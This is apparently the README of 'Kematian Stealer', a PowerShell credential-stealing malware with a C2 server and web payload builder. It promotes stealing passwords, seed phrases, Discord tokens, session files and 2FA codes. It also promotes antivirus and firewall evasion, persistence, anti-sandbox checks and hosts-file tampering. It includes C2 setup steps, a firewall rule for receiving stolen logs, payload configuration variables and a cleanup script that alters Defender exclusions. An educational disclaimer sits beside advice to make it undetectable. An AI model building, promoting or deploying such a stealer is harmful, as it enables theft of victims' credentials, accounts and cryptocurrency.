An advanced data recovery tool featuring a customizable C2 system, developed using Python, PowerShell, Go and C++ languages and equipped with a dedicated web-based GUI builder.
MIT License
Kematian Stealer is a PowerShell-based tool designed to effortlessly infiltrate and exfiltrate data from Windows systems. All information collected is transmitted via TCP to your C2 server, where everything is decrypted. It functions seamlessly across any x64bit
system, from Windows 10
or later, ensuring compatibility with the latest updates. With Kematian Stealer, you can retrieve seed phrases, session files, passwords, application data, Discord tokens
and more.
This tool is particularly advantageous for accessing application and file data without restrictions, while evading conventional security measures such as firewalls
and antivirus
software, thanks to its fileless capabilities
, which set it apart from other stealers. Upon execution, Kematian Stealer creates a mutex
on the system and designates the process as critical
before initiating data exfiltration, ensuring smooth and uninterrupted transmission of data.
Moreover, the tool has robust persistence mechanisms
to remain active on the machine after reboot. Additionally, its user-friendly web-based GUI builder
simplifies the process of creating payloads, enhancing its accessibility and usability.
[!TIP] Please refrain from opening issues related to detections, as it is pointless. This project's objective is to facilitate teaching and learning. If you need a FUD stealer, simply create one or REFUD it yourself.
private key
and certificate
at first run, you can find them here $env:appdata\Kematian-Stealer
https://127.0.0.1:8080
by default.https://127.0.0.1:8080/builder
TCP TUNNEL URL:PORT
sectionWindows Firewall
for receiving logsNew-NetFirewallRule -DisplayName "KematianC2" -Direction Inbound -Protocol TCP -LocalPort 8080 -Action Allow
$env:appdata\Kematian-Stealer\logs
[!NOTE] THE DEBUG OPTION IS FOR TESTING PURPOSES ONLY
$c2_server = "YOUR_URL_HERE_SERVER"
$debug = $false
$blockhostsfile = $false
$criticalprocess = $false
$melt = $false
$fakeerror = $false
$persistence = $false
$write_disk_only = $false
$vm_protect = $false
$encryption_key = "YOUR_ENC_KEY_HERE"
x64
.v5.0
or higher..ps1
files.bat
filesBAT
and PS1
fileszero-filled
bytesBSoD
blue screen of death).Windows Defender
VMWare, VirtualBox, Sandboxes, Emulators, Debuggers, Virustotal, Any.run
2fa codes, seedphrases, passwords, privatekeys, etc.
Gecko Browsers
and Chromium Browsers
Chromium browsers
and Gecko browsers
.$ErrorActionPreference = "SilentlyContinue"
function Cleanup {
Unregister-ScheduledTask -TaskName "Kematian" -Confirm:$False
Remove-Item -Path "$env:appdata\Kematian" -force -recurse
Remove-MpPreference -ExclusionPath "$env:APPDATA\Kematian"
Remove-MpPreference -ExclusionPath "$env:LOCALAPPDATA\Temp"
$resethostsfile = @'
# Copyright (c) 1993-2006 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handle within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
'@
[IO.File]::WriteAllText("$env:windir\System32\Drivers\etc\hosts", $resethostsfile)
Write-Host "[~] Successfully Uninstalled Kematian !" -ForegroundColor Green
}
Cleanup
Found a bug? Have an idea? Let me know here, Please provide a detailed explanation of the expected behavior, actual behavior, and steps to reproduce, or what you want to see and how it could be done. You can be a small part of this project!
This project is licensed under the MIT License - see the LICENSE file for details
The developers of Kematian Stealer disclaim any liability for actions or damages resulting from the use of this software. Users are fully responsible for their actions and recognize that this tool is intended solely for educational use. It is not meant to be used for malicious purposes or on systems that you do not own or have permission to access. By using this software, you implicitly agree to these terms.
Want to reach out about something? My email is [email protected]